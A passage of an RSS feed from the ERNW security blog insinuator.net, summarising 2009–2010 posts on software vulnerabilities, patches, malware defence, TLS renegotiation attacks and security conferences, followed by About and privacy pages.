      <description>&lt;p&gt;Finding exploitable vulnerabilities is getting harder. This statement of Dennis Fisher published on &lt;a href=&#34;http://threatpost.com/en_us/blogs/easily-exploitable-bugs-becoming-precious-commodity-090110&#34;&gt;Kaspersky’s Threatpost blog&lt;/a&gt; summarizes a trend in the development lifecycle of software . The last published vulnerabilities that were gaining some attention in the public had all one thing in common, they were quite hard to exploit. The so called jailbreakme vulnerability was based on several different vulnerabilities that had to be chained together to break out of the iPhone sandbox, escalate its privileges and run arbitrary code. Modern software and especially modern operating systems are more secure, they contain less software flaws and more protection features that make reliable exploitation a big problem that can only be solved by very skilled hackers. Decades ago it was just like this, but intelligent tools and sharing of the needed knowledge enabled even low skilled people to develop working exploits and attack vulnerable systems. Nowadays we are going back to the roots where only a few very knowledgeable people are able to circumvent modern security controls, but that doesn’t mean that all problems are gone. Attackers are moving to design flaws like the DLL highjacking problem, so only the class of attacks is changing from the old school memory corruption vulnerabilities to logical flaws that still can be exploited easily. But the number of exploitable vulnerabilities is decreasing, so this might be a sign that we are on the right way to develop reliable and secure systems and that developing companies are adopting Microsofts Secure Development Lifecycle (SDL) to produce more secure software. As stated in my previous &lt;a href=&#34;http://www.insinuator.net/2010/07/software-developers-dont-use-available-security-features/&#34;&gt;blogpost&lt;/a&gt; the protection features are available, but not used very often. But if they are used and if the developers are strictly following the recommendations of the SDL, this trend of “harder to exploit vulnerabilities” proves that it can be a success story to do so.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Intel’s &lt;i&gt;Known Good&lt;/i&gt; Approach — Chances for a Paradigm Shift?</title>
      <link>https://insinuator.net/2010/09/intels-iknown-good/i-approach-chances-for-a-paradigm-shift/</link>
      <pubDate>Sat, 18 Sep 2010 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2010/09/intels-iknown-good/i-approach-chances-for-a-paradigm-shift/</guid>
      <description>&lt;p&gt;During the keynote of the &lt;a href=&#34;http://download.intel.com/newsroom/kits/idf/2010_fall/pdfs/Day1_IDF_Keynote_Transcript_Otellini.pdf&#34;&gt;Intel Developer Forum&lt;/a&gt;, Intel’s CEO Paul Otellini explained their motivation for the acquisition of McAfee. Basically, Intel wants to provide a possibility to shift computer security from &lt;em&gt;a known bad model to something that is a known good model&lt;/em&gt;.&lt;/p&gt;&#xA;&lt;p&gt;Coming back to some of our &lt;a href=&#34;http://www.insinuator.net/2010/08/just-a-quick-note-on-the-library-loading-binary-planting-stuff/&#34;&gt;recent&lt;/a&gt; &lt;a href=&#34;http://www.insinuator.net/2010/09/that-new-worm/&#34;&gt;blog posts&lt;/a&gt;, we think that a reliable and working approach to implement application whitelisting would increase security in corporate environments — especially when thinking of the latest vulnerabilities with exploit code in the wild that could not be catched up by any AV solution. As covered by &lt;a href=&#34;http://feeds.arstechnica.com/~r/arstechnica/everything/~3/ZyQ42S4_7PU/intels-walled-garden-plan-to-put-av-vendors-out-of-business.ars&#34;&gt;this article&lt;/a&gt;, the possibility that such an approach succeeds depends heavily on the critical mass that would use it. The widespread &lt;a href=&#34;http://www.intel.com/Assets/PDF/manual/253666.pdf&#34;&gt;x86 architecture&lt;/a&gt; therefore is the perfect plattform for accomplishing a widely used known good model. Presuming the possibility for flexibel and secure operation, Intel’s efforts could be the chance to shift the paradigm of corporate security from a reactive to a preventive model.&lt;/p&gt;</description>
    </item>
    <item>
      <title>MS10-063, Prevention</title>
      <link>https://insinuator.net/2010/09/ms10-063-prevention/</link>
      <pubDate>Wed, 15 Sep 2010 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2010/09/ms10-063-prevention/</guid>
      <description>&lt;p&gt;One of the four vulnerabilities rated “critical” from yesterday’s MS patchday, that is &lt;a href=&#34;http://www.microsoft.com/technet/security/bulletin/MS10-063.mspx&#34;&gt;MS10-063&lt;/a&gt;, has an interesting “Workarounds” section as for MS Internet Explorer. There it’s stated:&lt;/p&gt;&#xA;&lt;p&gt;“Disabling the support for the parsing of embedded fonts in Internet Explorer prevents this application from being used as an attack vector.”&lt;/p&gt;&#xA;&lt;p&gt;which, according to the advisory, should/can be done by setting the “Font Downloading” parameter to “Disable”.&lt;/p&gt;&#xA;&lt;p&gt;Which is exactly what &lt;a href=&#34;http://www.ernw.de/content/e15/e28/e1497/download1499/ERNW_Newsletter_31_Secure_IE8_Configuration_en_ger.pdf&#34;&gt;this document&lt;/a&gt; suggests. So taking a preventive approach, once more, might have saved some concerns (“Will we be targeted by this one”) and patch/testing time…&lt;/p&gt;</description>
    </item>
    <item>
      <title>That “new worm”…</title>
      <link>https://insinuator.net/2010/09/that-new-worm/</link>
      <pubDate>Mon, 13 Sep 2010 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2010/09/that-new-worm/</guid>
      <description>&lt;p&gt;Recently I noticed &lt;a href=&#34;http://www.h-online.com/security/news/item/New-email-worm-on-the-move-1076585.html&#34;&gt;this news&lt;/a&gt; titled “New email worm on the move”. At roughly the same time I received an email from a senior security responsible from a large customer asking for mitigation advice as they got “hit pretty hard” (by this exact piece of malware).&lt;br&gt;&#xA;Given I’m mainly an infrastructure and architecture guy usually I’m not too involved in malware protection stuff (besides my continuous ranting that – from an architectural point of view – endpoint based antivirus has a bad security benefit vs. capex/opex ratio). So I’m by no means an expert in this field. Still I keep scratching my head when I read the associated announcements (like &lt;a href=&#34;http://blog.trendmicro.com/old-malware-out-of-its-shell/&#34;&gt;this&lt;/a&gt;, &lt;a href=&#34;http://www.avertlabs.com/research/blog/index.php/2010/09/09/widespread-reporting-of-here-you-have-virus/&#34;&gt;this&lt;/a&gt; or &lt;a href=&#34;http://www.symantec.com/business/security_response/writeup.jsp?docid=2010-090922-4703-99&#34;&gt;this&lt;/a&gt;) from major “antivirus”, “malware protection” or “endpoint security” vendors – to save typing, in the remainder of the post I call them SNAKE vendors (where “SNAKE” stands for “Smart Nimble APT Kombat Execution”… or sth equally ingenious of the valued reader’s choice… 😉&lt;/p&gt;</description>
    </item>
    <item>
      <title>“blackberry api to record phone calls”</title>
      <link>https://insinuator.net/2010/08/blackberry-api-to-record-phone-calls/</link>
      <pubDate>Wed, 25 Aug 2010 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2010/08/blackberry-api-to-record-phone-calls/</guid>
      <description>&lt;p&gt;This is currently the most frequent search term leading Internet users to the Troopers website.&lt;br&gt;&#xA;Probably &lt;a href=&#34;http://www.troopers.de/content/e728/e897/e900/TROOPERS10_Bugs_and_Kisses_Sheran_Gunasekera.pdf&#34;&gt;Sheran Gunasekera’s great presentation “Bugs &amp;amp; Kisses – Spying on BlackBerry users for fun”&lt;/a&gt; is the piece they are after. Whatever they look for, this search term may help to shed light to an aspect that seems a bit overlooked in the ongoing debate about governments (U.A.E., Saudi Arabia, India) trying to get their hands on communication acts performed with BlackBerries in their countries.&lt;br&gt;&#xA;[For those interested in that discussion &lt;a href=&#34;http://www.schneier.com/blog/archives/2010/08/uae_to_ban_blac.html&#34;&gt;this blog entry of Bruce Schneier&lt;/a&gt; may serve as a starting point.]&lt;/p&gt;</description>
    </item>
    <item>
      <title>Just a Quick Note on the Library Loading / Binary Planting Stuff</title>
      <link>https://insinuator.net/2010/08/just-a-quick-note-on-the-library-loading-/-binary-planting-stuff/</link>
      <pubDate>Tue, 24 Aug 2010 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2010/08/just-a-quick-note-on-the-library-loading-/-binary-planting-stuff/</guid>
      <description>&lt;p&gt;For those of you who missed it: Microsoft released the &lt;a href=&#34;http://www.microsoft.com/technet/security/advisory/2269637.mspx&#34;&gt;associated advisory&lt;/a&gt; yesterday, together with a &lt;a href=&#34;http://support.microsoft.com/?kbid=2264107&#34;&gt;hotfix&lt;/a&gt; introducing a new registry key that allows users to control the DLL search path algorithm. For a detailed explanation of the problem we refer to &lt;a href=&#34;http://arstechnica.com/microsoft/news/2010/08/new-windows-dll-security-flaw-everything-old-is-new-again.ars&#34;&gt;the excellent article on Ars Technica&lt;/a&gt;.&lt;/p&gt;&#xA;&lt;p&gt;For the record: no, AV (anti-virus software) will – in most cases – not protect you from security problems related to this one. And, no, there is no easy patch for this one either.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Research on “Application Virtualization” – Results online now</title>
      <link>https://insinuator.net/2010/08/research-on-application-virtualization-results-online-now/</link>
      <pubDate>Mon, 16 Aug 2010 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2010/08/research-on-application-virtualization-results-online-now/</guid>
      <description>&lt;p&gt;Just wanted to let you know that we sent out &lt;a href=&#34;http://ernw.de/content/e15/e28/e1575/download1577/ERNW_Newsletter_32_ThinApp_signed_en_ger.pdf&#34;&gt;ERNW Newsletter 32&lt;/a&gt; end of last week. As we &lt;a href=&#34;http://www.insinuator.net/2010/08/application-virtualization-as-browser-security-control/&#34;&gt;promised&lt;/a&gt; it includes the results of  research regarding the question “Is browser virtualization a valid security control in order to mitigate browser based security risks?”.&lt;/p&gt;&#xA;&lt;p&gt;Simon did a great job with writing the latest newsletter. It’s a 30-page document which should help you to have a basis for well-informed decisions when it comes to the deployment of an application virtualization technology.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Try Loki!</title>
      <link>https://insinuator.net/2010/08/try-loki/</link>
      <pubDate>Wed, 11 Aug 2010 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2010/08/try-loki/</guid>
      <description>&lt;p&gt;&lt;a href=&#34;http://www.insinuator.net/wp-content/uploads/2010/08/ERNW_loki_tool.jpg&#34;&gt;&lt;img src=&#34;http://www.insinuator.net/wp-content/uploads/2010/08/ERNW_loki_tool.jpg&#34; alt=&#34;Loki is set free!&#34; title=&#34;ERNW_loki_tool&#34;&gt;&lt;/a&gt;&lt;/p&gt;&#xA;&lt;p&gt;Everybody who is interested in our newest tool ‘Loki’ is welcomed to head over to &lt;a href=&#34;http://ernw.de/content/e6/e180/index_eng.html&#34;&gt;ERNW’s tool section&lt;/a&gt; and download it. Take this monster for a spin and let us know in the comments how you like it. Loki’s coding father Daniel is more than happy to answer your questions and criticism.&lt;/p&gt;&#xA;&lt;p&gt;You don’t even know what Loki is?&lt;/p&gt;&#xA;&lt;p&gt;In short: An advanced security testing tool for layer 3 protocols.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Application Virtualization as Browser Security Control?</title>
      <link>https://insinuator.net/2010/08/application-virtualization-as-browser-security-control/</link>
      <pubDate>Mon, 09 Aug 2010 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2010/08/application-virtualization-as-browser-security-control/</guid>
      <description>&lt;p&gt;One of the biggest pains in the ass of most ISOs – and subsequently subject of fierce debates between business and infosec – is the topic of “Browser Security”, i.e. essentially the question “How to protect the organization from malicious code  brought into the environment by users surfing the Internet?”.&lt;/p&gt;&#xA;&lt;p&gt;Commonly the chain of events (of a typical malware infection act) can be broken down to the following steps:&lt;/p&gt;&#xA;&lt;p&gt;1.) Some code – no matter if binary or script code – gets transferred (mostly: downloaded) to some system “from the Internet”, that means “over the network”.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Spooky Story about Break-In in Military Contractor Facility</title>
      <link>https://insinuator.net/2010/07/spooky-story-about-break-in-in-military-contractor-facility/</link>
      <pubDate>Sun, 25 Jul 2010 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2010/07/spooky-story-about-break-in-in-military-contractor-facility/</guid>
      <description>&lt;p&gt;… recently published &lt;a href=&#34;http://www.tampabay.com/news/publicsafety/crime/thieves-swipe-thousands-of-laptops-from-special-ops-contractor-in/1108521&#34;&gt;here&lt;/a&gt;.&lt;br&gt;&#xA;While I certainly agree with those comments stating that there’s a fishy element in the – conspiracy theory nurturing – story itself, this reminds me that Graeme Neilson (who gave the “&lt;a href=&#34;http://www.troopers.de/content/e728/e897/e938/TROOPERS10_Netscreen_of_the_Dead_Graeme_Neilson.pdf&#34;&gt;Netscreen of the Dead&lt;/a&gt;” talk at &lt;a href=&#34;http://www.troopers.de&#34;&gt;Troopers&lt;/a&gt;, discussing modified firmware on Juniper and Fortinet devices) and I plan to give a talk on “Supply Chain (In-)Security” at this year’s &lt;a href=&#34;http://www.day-con.org&#34;&gt;Day-Con&lt;/a&gt; event. We still have to figure out with Angus if it fits into the agenda (and if we have enough material for an interesting 45 min storyline ;-)) though. Stay tuned for news on this here.&lt;/p&gt;</description>
    </item>
    <item>
      <title>News from the Desktop, Edition 2010/07/21</title>
      <link>https://insinuator.net/2010/07/news-from-the-desktop-edition-2010/07/21/</link>
      <pubDate>Wed, 21 Jul 2010 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2010/07/news-from-the-desktop-edition-2010/07/21/</guid>
      <description>&lt;p&gt;Back on track as for one of our favorite rant subjects: desktop security. &lt;a href=&#34;http://www.microsoft.com/technet/security/advisory/2286198.mspx&#34;&gt;This stuff&lt;/a&gt;, commonly called the “LNK vulnerability”, has gained quite some momentum in the last days, including the release of &lt;a href=&#34;http://www.metasploit.com/modules/exploit/windows/browser/ms10_xxx_windows_shell_lnk_execute&#34;&gt;a &lt;em&gt;Metasploit&lt;/em&gt; module&lt;/a&gt; and a temporary raise of &lt;a href=&#34;http://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt;‘s Infocon level to yellow (it’s back on green in the interim).&lt;/p&gt;&#xA;&lt;p&gt;CVE-2010-2568 has been assigned and some technical details can be found &lt;a href=&#34;http://blogs.technet.com/b/mmpc/archive/2010/07/16/the-stuxnet-sting.aspx&#34;&gt;here&lt;/a&gt; and &lt;a href=&#34;http://www.sophos.com/blogs/chetw&#34;&gt;here&lt;/a&gt;.&lt;/p&gt;&#xA;&lt;p&gt;To give you a rough idea how this piece works, here’s a quote from the &lt;a href=&#34;http://www.kb.cert.org/vuls/id/940193&#34;&gt;US-CERT advisory&lt;/a&gt;:&lt;/p&gt;</description>
    </item>
    <item>
      <title>Software Developers Don’t Use Available Security Features</title>
      <link>https://insinuator.net/2010/07/software-developers-dont-use-available-security-features/</link>
      <pubDate>Wed, 21 Jul 2010 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2010/07/software-developers-dont-use-available-security-features/</guid>
      <description>&lt;p&gt;According to &lt;a href=&#34;http://www.sans.org/newsletters/newsbites/newsbites.php&#34;&gt;SANS NewsBites Vol. XII, Issue 53&lt;/a&gt; recently published there’s a lack of 3rd party developer support for some security features Microsoft introduced already years ago. We at ERNW have made similar observations when performing security assessments of COTS [commercial off-the-shelf] software. We therefore created a methodology, a &lt;a href=&#34;http://www.ernw.de/content/e7/e181/e1501/download1541/TTICheck_ger.zip&#34;&gt;proof of concept tool&lt;/a&gt; and a metric to test and to rate closed source software, where (amongst other approaches) these security features are checked and their (non-) presence contributes to an overall evaluation as for the trustworthiness of the applications in question. The concept “How to rate the security in closed source software” was presented to the public at &lt;a href=&#34;http://www.troopers.de&#34;&gt;Troopers10&lt;/a&gt; and at &lt;a href=&#34;https://conference.hackinthebox.org&#34;&gt;Hack in the Box 2010&lt;/a&gt; in Amsterdam. The slides can be found &lt;a href=&#34;http://www.ernw.de/content/e7/e181/e1501/download1542/ERNW_HITB2010_How_to_rate_the_security_of_closed_source_software_Michael_Thumann_ger.pdf&#34;&gt;here&lt;/a&gt;.&lt;/p&gt;</description>
    </item>
    <item>
      <title>The Emperor’s New Security Indicators</title>
      <link>https://insinuator.net/2010/07/the-emperors-new-security-indicators/</link>
      <pubDate>Sun, 18 Jul 2010 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2010/07/the-emperors-new-security-indicators/</guid>
      <description>&lt;p&gt;Interesting research from Stuart Schechter et.al. &lt;a href=&#34;http://usablesecurity.org/emperor/&#34;&gt;here&lt;/a&gt;.&lt;br&gt;&#xA;They evaluated the effect that the removal or modification of online banking sites’ security features had on the users’ behavior (as for entering or withholding their passwords). Maybe for some of you not too surprising it turned out that the vast majority of users entered their passwords even if obviously alarming clues were present on the websites.&lt;br&gt;&#xA;This, again, shows how important it is to understand how users behave, what their motives and incentives are and how to build environments that help them acting securely. This even more applies to corporate space. At times, bringing an industrial/organizational psychologist in might be a much better investment than writing yet-another-ignored-piece-of-policy.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Our Favorite Subject: [It’s all about] Risk</title>
      <link>https://insinuator.net/2010/07/our-favorite-subject-its-all-about-risk/</link>
      <pubDate>Sun, 11 Jul 2010 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2010/07/our-favorite-subject-its-all-about-risk/</guid>
      <description>&lt;p&gt;Some days ago my old friend Pete Herzog from &lt;a href=&#34;http://www.isecom.org&#34;&gt;ISECOM&lt;/a&gt; posted a blog entry titled “Hackers May Be Giants with Sharp Teeth” &lt;a href=&#34;https://www.infosecisland.com/blogview/5031-Hackers-May-Be-Giants-with-Sharp-Teeth.html&#34;&gt;here&lt;/a&gt; which – along with some quite insightful reflections on the way kids perceive “bad people” – contains his usual rant on (the uselessness of) risk assessment.&lt;br&gt;&#xA;Given that this debate (whether taking a risk-based infosec approach is a wise thing or not) is a constant element of our – Pete’s and mine – long lasting relationship I somehow feel enticed to respond 😉&lt;/p&gt;</description>
    </item>
    <item>
      <title>ERNW at NinjaCon (fka PlumberCon)</title>
      <link>https://insinuator.net/2010/07/ernw-at-ninjacon-fka-plumbercon/</link>
      <pubDate>Sat, 10 Jul 2010 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2010/07/ernw-at-ninjacon-fka-plumbercon/</guid>
      <description>&lt;p&gt;&lt;a href=&#34;http://www.insinuator.net/wp-content/uploads/2010/07/ninja_con.jpg&#34;&gt;&lt;img src=&#34;http://www.insinuator.net/wp-content/uploads/2010/07/ninja_con.jpg&#34; alt=&#34;&#34; title=&#34;ninja_con&#34;&gt;&lt;/a&gt;&lt;/p&gt;&#xA;&lt;p&gt;Yesterday we made our way to Vienna to participate and contribute to NinjaCon (formerly known as PlumberCon, before Nintendo Inc. claimed their rights ;)).&lt;/p&gt;&#xA;&lt;p&gt;After our arrival Oliver held a five hour workshop on &lt;a href=&#34;http://plumbercon.org/schedule/68&#34;&gt;Penetration Testing&lt;/a&gt; and did the finishing touches on his slides about ‘&lt;a href=&#34;http://plumbercon.org/schedule/49&#34;&gt;Attacking Cisco Enterprise WLANs&lt;/a&gt;‘, which he will deliver later today together with Daniel. And last but not least Daniel will be the Packet Master of PacketWars™ Vienna taking place in the evening.&lt;/p&gt;</description>
    </item>
    <item>
      <title>TROOPERS10 presentation materials finally online</title>
      <link>https://insinuator.net/2010/06/troopers10-presentation-materials-finally-online/</link>
      <pubDate>Mon, 21 Jun 2010 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2010/06/troopers10-presentation-materials-finally-online/</guid>
      <description>&lt;p&gt;I’m happy to announce that the presentations and a majority of the videos from TROOPERS10 are finally available to you.&lt;/p&gt;&#xA;&lt;p&gt;You’ll find the slides at the conference’s website &lt;a href=&#34;http://www.troopers.de&#34;&gt;troopers.de&lt;/a&gt;, more precisely &lt;a href=&#34;http://troopers.de/content/e728/e897/index_eng.html&#34;&gt;here&lt;/a&gt;. Plenty of videos were uploaded and are now ready for streaming at &lt;a href=&#34;http://www.viddler.com/TROOPERS/&#34;&gt;viddler.com/TROOPERS&lt;/a&gt;. Enjoy!&lt;/p&gt;&#xA;&lt;p&gt;Please excuse the long waiting time – this is a big point on our ‘improvements for upcoming events’ list. Talking about improvements: If you have any suggestions, criticism or even praise for past or upcoming events – let us know in the comment section.&lt;/p&gt;</description>
    </item>
    <item>
      <title>News from Old Friends, Edition 2010/06/09</title>
      <link>https://insinuator.net/2010/06/news-from-old-friends-edition-2010/06/09/</link>
      <pubDate>Wed, 09 Jun 2010 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2010/06/news-from-old-friends-edition-2010/06/09/</guid>
      <description>&lt;p&gt;This is the first post of a – potential – series of rants on ubiquitous pieces of crap (security-wise), bothering pretty much every ISO I know.&lt;br&gt;&#xA;I’m talking about “common desktop applications” and today’s topic is going to be the beloved Adobe Flash Player. Some of you who had the opportunity (or imposition 😉 to listen to one my talks covering “modern enterprise security space” (e.g. &lt;a href=&#34;http://troopers09.org/content/e644/e676/TROOPERS09_rey_keynote_stop_the_madness.pdf&#34;&gt;this one&lt;/a&gt;) might remember me saying sth like “If a fairy godmother turned up and asked me for three things to get rid of in order to enhance overall corporate information security in a sustainable way, my answers would be…” and then giving Adobe Flash as the first mention. (before you ask: amongst the other candidates are Apple Quicktime, Windows GDI and “Javascript in Acrobat Reader”).&lt;/p&gt;</description>
    </item>
    <item>
      <title>Some reflections on virtualization security, part 1</title>
      <link>https://insinuator.net/2009/12/some-reflections-on-virtualization-security-part-1/</link>
      <pubDate>Mon, 07 Dec 2009 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2009/12/some-reflections-on-virtualization-security-part-1/</guid>
      <description>&lt;p&gt;Today was an interesting day, for a number of reasons. Amongst those it stuck out that we were approached by two very large environments (both &amp;gt; 50K employees) to provide security review/advise, as they want to “virtualize their DMZs, by means of VMware ESX”.&lt;br&gt;&#xA;[yes, more correctly I could/should have written: “virtualize some of their DMZ segments”. but this essentially means: “mostly all of their DMZs” in 6-12 months. and “their DMZ backend systems together with some internal servers” in 12-24 months. and “all of this” in 24-36 months. so it’s the same discussion anyway, just on a shifted timescale ;-)]&lt;/p&gt;</description>
    </item>
    <item>
      <title>New SSL/TLS MiTM Attacks</title>
      <link>https://insinuator.net/2009/11/new-ssl/tls-mitm-attacks/</link>
      <pubDate>Mon, 09 Nov 2009 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2009/11/new-ssl/tls-mitm-attacks/</guid>
      <description>&lt;p&gt;A number of customers has approached us with questions like “Those new MiTM attacks against SSL/TLS, what’s their impact as for the security of our SSL VPNs with client certificates”?&lt;br&gt;&#xA;In the following we give our estimation, based on the information publicly available as of today.&lt;/p&gt;&#xA;&lt;p&gt;On 11/04/09 two security researchers (Marsh Ray and Steve Dispensa) published a &lt;a href=&#34;http://extendedsubset.com/Renegotiating_TLS.pdf&#34;&gt;paper&lt;/a&gt; describing some previously (presumably/hopefully) unknown MiTM attacks against SSL/TLS. CVE-2009-3555 was assigned to the underlying vulnerabilities within SSL/TLS.&lt;br&gt;&#xA;The attacks described might potentially allow an attacker to hijack an authenticated user’s (SSL/TLS) session. In an &lt;a href=&#34;https://svn.resiprocate.org/rep/ietf-drafts/ekr/draft-rescorla-tls-renegotiate.txt&#34;&gt;IETF draft&lt;/a&gt; published 11/09/09 and describing a potential protocol extension intended to mitigate the attacks the following is stated:&lt;br&gt;&#xA;“SSL and TLS renegotiation are vulnerable to an attack in which the attacker forms a TLS connection with the target server, injects content of his choice, and then splices in a new TLS connection from a client.  The server treats the client’s initial TLS handshake as a renegotiation and thus believes that the initial data transmitted by the attacker is from the same entity as the subsequent client data.”&lt;/p&gt;</description>
    </item>
    <item>
      <title>If they had used DLP…</title>
      <link>https://insinuator.net/2009/10/if-they-had-used-dlp/</link>
      <pubDate>Sat, 31 Oct 2009 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2009/10/if-they-had-used-dlp/</guid>
      <description>&lt;p&gt;… &lt;a href=&#34;http://www.securityfocus.com/brief/1030&#34; title=&#34;Security Focus on Peer to Peer Data Loss&#34;&gt;this&lt;/a&gt; would not have happened. At least this is what $SOME_DLP_VENDOR might tell you.&lt;br&gt;&#xA;Maybe, maybe not. It wouldn’t have happened if they’d followed “common security best practices” either. Like “not to process sensitive data on (presumably) private laptops” or “not to run file sharing apps on organizational ones” or “not to connect to organizational VPNs and home networks simultanously”. yadda yadda yadda.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Series on “Outdated Threat Models” – Part 1</title>
      <link>https://insinuator.net/2009/10/series-on-outdated-threat-models-part-1/</link>
      <pubDate>Sun, 25 Oct 2009 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2009/10/series-on-outdated-threat-models-part-1/</guid>
      <description>&lt;p&gt;Yesterday I took a long run (actually I did the full distance &lt;a href=&#34;http://www.albmarathon.de&#34;&gt;here&lt;/a&gt;) and usually such exercises are good opportunities to “reflect on the world in general and the infosec dimension of it in particular”… at least as long as your blood sugar is still on a level to support somewhat reasonable brain activity 😉&lt;/p&gt;&#xA;&lt;p&gt;Anyhow, one of the outcomes of the number of strange mental stages I went through was the idea of a series of blogposts on architectural or technological approaches that are widely regarded as “good security practice” but may – when looked at with a bit more of scrutiny – turn out to be based on what I’d call “outdated threat models”.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Welcome to insinuator.net</title>
      <link>https://insinuator.net/2009/10/welcome-to-insinuator.net/</link>
      <pubDate>Tue, 20 Oct 2009 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2009/10/welcome-to-insinuator.net/</guid>
      <description>&lt;p&gt;Welcome to insinuator.net, the semi-official blog of &lt;a href=&#34;http://www.ernw.net&#34; title=&#34;ERNW Website&#34;&gt;ERNW GmbH&lt;/a&gt;.&lt;br&gt;&#xA;You may ask: Why yet another infosec blog? Aren’t there already just too many around? Well, possibly. But that opulence is part of blogging in general, isn’t it? 😉&lt;br&gt;&#xA;Given we are trying to contribute to “public space &amp;amp; opinion” in a number of ways anyway [e.g. by our &lt;a href=&#34;http://www.ernw.de/content/e7/e181/index_eng.html&#34; title=&#34;Event Archives&#34;&gt;presentations&lt;/a&gt; or our &lt;a href=&#34;http://www.ernw.net/nl&#34; title=&#34;ERNW Newsletter&#34;&gt;newsletter&lt;/a&gt;] it seemed just too logical – and we’ve been asked by various people as well – to add another element to global blogosphere. Voilà, here we go!&lt;br&gt;&#xA;What can you, dear reader, expect? Of course all kinds of shameless self-references, maybe occasionally a little bit of insight or even wisdom (yes, you’re right: modesty is not amongst our key virtues, at times) and – hopefully – some entertainment.&lt;/p&gt;</description>
    </item>
    <item>
      <title>About</title>
      <link>https://insinuator.net/about/</link>
      <pubDate>Mon, 01 Jan 0001 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/about/</guid>
      <description>&lt;p&gt;This blog creates a place for &lt;a href=&#34;http://www.ernw.de&#34;&gt;ERNW&lt;/a&gt; specialists to openly&#xA;discuss, develop and spread their latest thoughts on IT-Security. Peppered with&#xA;additional info to closely related stuff and some behind the scenes impressions&#xA;of our daily work we hope that you enjoy ‘listening to the Insinuator’.&lt;/p&gt;&#xA;&lt;p&gt;We’re also organizing one of the &lt;strong&gt;finest international IT security&#xA;conferences&lt;/strong&gt; around the world. It’s taking place once a year right in our&#xA;beautiful home base Heidelberg, Germany. To get all the details please visit&#xA;&lt;a href=&#34;https://www.troopers.de&#34;&gt;www.troopers.de&lt;/a&gt; or watch this&#xA;&lt;a href=&#34;https://www.youtube.com/watch?v=Yg4Yg3tllcY&#34;&gt;trailer&lt;/a&gt; to get&#xA;some insights into the spirit of the event.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Datenschutzerklärung</title>
      <link>https://insinuator.net/datenschutz/</link>
      <pubDate>Mon, 01 Jan 0001 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/datenschutz/</guid>
      <description>&lt;p&gt;Find the English version &lt;a href=&#34;https://insinuator.net/privacy/&#34;&gt;here&lt;/a&gt;.&lt;/p&gt;&#xA;&lt;p&gt;Wir freuen uns sehr über Ihr Interesse an unserem Unternehmen. Datenschutz hat einen besonders hohen Stellenwert für die Geschäftsleitung der ERNW Enno Rey Netzwerke GmbH. Eine Nutzung der Internetseiten der ERNW Enno Rey Netzwerke GmbH ist grundsätzlich ohne jede Angabe personenbezogener Daten möglich. Sofern eine betroffene Person besondere Services unseres Unternehmens über unsere Internetseite in Anspruch nehmen möchte, könnte jedoch eine Verarbeitung personenbezogener Daten erforderlich werden. Ist die Verarbeitung personenbezogener Daten erforderlich und besteht für eine solche Verarbeitung keine gesetzliche Grundlage, holen wir generell eine Einwilligung der betroffenen Person ein.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Privacy Policy</title>
      <link>https://insinuator.net/privacy/</link>
      <pubDate>Mon, 01 Jan 0001 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/privacy/</guid>
      <description>&lt;p&gt;Die deutsche Version finden Sie &lt;a href=&#34;https://insinuator.net/datenschutz/&#34;&gt;hier&lt;/a&gt;.&lt;/p&gt;&#xA;&lt;p&gt;We are very delighted that you have shown interest in our enterprise. Data protection is of a particularly high priority for the management of the ERNW Enno Rey Netzwerke GmbH. The use of the Internet pages of the ERNW Enno Rey Netzwerke GmbH is possible without any indication of personal data; however, if a data subject wants to use special enterprise services via our website, processing of personal data could become necessary. If the processing of personal data is necessary and there is no statutory basis for such processing, we generally obtain consent from the data subject.&lt;/p&gt;</description>
    </item>
  </channel>
</rss>
